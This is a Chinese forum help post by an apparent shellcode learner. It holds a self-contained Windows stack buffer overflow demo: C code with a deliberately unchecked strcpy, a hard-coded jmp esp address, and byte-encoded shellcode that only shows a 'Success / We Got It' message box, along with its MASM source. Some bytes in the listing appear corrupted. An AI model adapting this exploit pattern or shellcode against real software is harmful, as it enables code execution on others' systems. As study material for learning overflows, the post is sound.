学习shellcode遇到一个有关问题，高手帮忙啊

2012-03-01

【求助】学习shellcode遇到一个问题，高手帮忙啊~！#includestring.h#includestdio.h#includewindows.h#

【求助】学习shellcode遇到一个问题，高手帮忙啊~！
#include <string.h>
#include <stdio.h>
#include <windows.h>

#define JUMPESP "\x28\x59\xD8\x77 "
unsigned char eip[8] = JUMPESP;
unsigned char exploit[] =
{
"\x60 "
"\x8B\xEC "
"\x83\xEC\x54 "
"\x33\xC9 "
"\xC6\x45\xDB\x75 "
"\xC6\x45\xDC\x73 "
"\xC6\x45\xDD\x65 "
"\xC6\x45\xDE\x72 "
"\xC6\x45\xDF\x33 "
"\xC6\x45\xE0\x32 "
"\xC6\x45\xE7\x2E "
"\xC6\x45\xE\x64 "
"\xC6\x45\xE9\x6C "
"\xC6\x45\xEA\x6C "
"\x88\x4D\xEB "
"\x8D\x45\xDB "
"\x50 "
"\xB8\x77\x1D\x80\x7C "
"\xFF\xD0 "
"\x55 "
"\x51 "
"\x8B\xEC "
"\x83\xEC\x54 "
"\x33\xC9 "
"\xC6\x45\xEC\x53 "
"\xC6\x45\xED\x75 "
"\xC6\x45\xEE\x63 "
"\xC6\x45\xEF\x63 "
"\xC6\x45\xF0\x65 "
"\xC6\x45\xF1\x73 "
"\xC6\x45\xF2\x73 "
"\x88\x4D\xF3 "
"\xC6\x45\xF4\x57 "
"\xC6\x45\xF5\x65 "
"\xC6\x45\xF6\x20 "
"\xC6\x45\xF7\x47 "
"\xC6\x45\xF8\x6F "
"\xC6\x45\xF9\x74 "
"\xC6\x45\xFA\x20 "
"\xC6\x45\xFB\x49 "
"\xC6\x45\xFC\x74 "
"\xC6\x45\xFD\x21 "
"\x88\x4D\xFE "
"\x51 "
"\x8D\x45\xEC "
"\x50 "

"\x8D\x45\xF4 "
"\x50 "
"\x51 "
"\xB8\xEA\x04\xD5\x77 "
"\xFF\xD0 "
"\x33\xDB "
"\x53 "
"\xB8\xA2\xCA\x81\x7C "
"\xFF\xD0 "
"\x8B\xE5 "
"\x61 "

};
int MyCopy( char* str )
{
char buff1[50];
strcpy(buff1,str);
return 1;
}
int main()
{
HINSTANCE u32=NULL;
u32=LoadLibrary( "user32.dll ");
if(u32==NULL)
{
printf( "cann 't load user32.dll ");
}
char Buff[1024];
memset(&Buff,0,sizeof(Buff));
for(int i=0;i <56;Buff[i++]=0x90);
strcpy(Buff+56,(char *)eip);//
strcpy(Buff+60,(char *)exploit);//
MyCopy(Buff);
printf( "\n successed \n ");
return 0;
}
//shellcode汇编源码=======================================================
.386
.model flat,stdcall
option casemap:none
include d:\masm32\hd.h
.code
start:
pushad ;
mov ebp,esp
sub esp,54h ;
xor ecx,ecx ;
mov byte ptr [ebp-25h], 'u '
mov byte ptr [ebp-24h], 's '
mov byte ptr [ebp-23h], 'e '
mov byte ptr [ebp-22h], 'r '
mov byte ptr [ebp-21h], '3 '
mov byte ptr [ebp-20h], '2 '
mov byte ptr [ebp-19h], '. '
mov byte ptr [ebp-18h], 'd '
mov byte ptr [ebp-17h], 'l '
mov byte ptr [ebp-16h], 'l '
mov byte ptr [ebp-15h],cl;;
lea eax,[ebp-25h]
push eax
mov eax,07c801d77h ;LoadLibrary的地址
call eax ;调用LoadLibrary装载user32.dll
xor ecx,ecx ;清零
mov byte ptr [ebp-14h], 'S '
mov byte ptr [ebp-13h], 'u '
mov byte ptr [ebp-12h], 'c '
mov byte ptr [ebp-11h], 'c '
mov byte ptr [ebp-10h], 'e '
mov byte ptr [ebp-0Fh], 's '
mov byte ptr [ebp-0Eh], 's '
mov byte ptr [ebp-0Dh],cl
mov byte ptr [ebp-0Bh], 'e '

mov byte ptr [ebp-0Ah], ' '
mov byte ptr [ebp-9], 'G '
mov byte ptr [ebp-8], 'o '
mov byte ptr [ebp-7], 't '
mov byte ptr [ebp-6], ' '
mov byte ptr [ebp-5], 'I '
mov byte ptr [ebp-4], 't '
mov byte ptr [ebp-3], '! '
mov byte ptr [ebp-2],cl
;
push ecx;MB_OK
lea eax,[ebp-14h]
push eax ;success
lea eax,[ebp-0Ch]
push eax ;we got it
push ecx
mov eax,077d504eah ;MessageBoxA
call eax
xor ecx,ecx
push ecx
mov eax,07c81caa2h ;Exitprocess
call eax
popad;恢复其值
end start
==========================================================================
//一个简单的缓冲区溢出,溢出成功后显示一个messagebox.
当溢出成功后，如何返回到main函数中继续后面的执行呢?
留个qq:406670611

[解决办法]
《Shellcoder编程揭秘》

热点排行

C语言

学习shellcode遇到一个有关问题，高手帮忙啊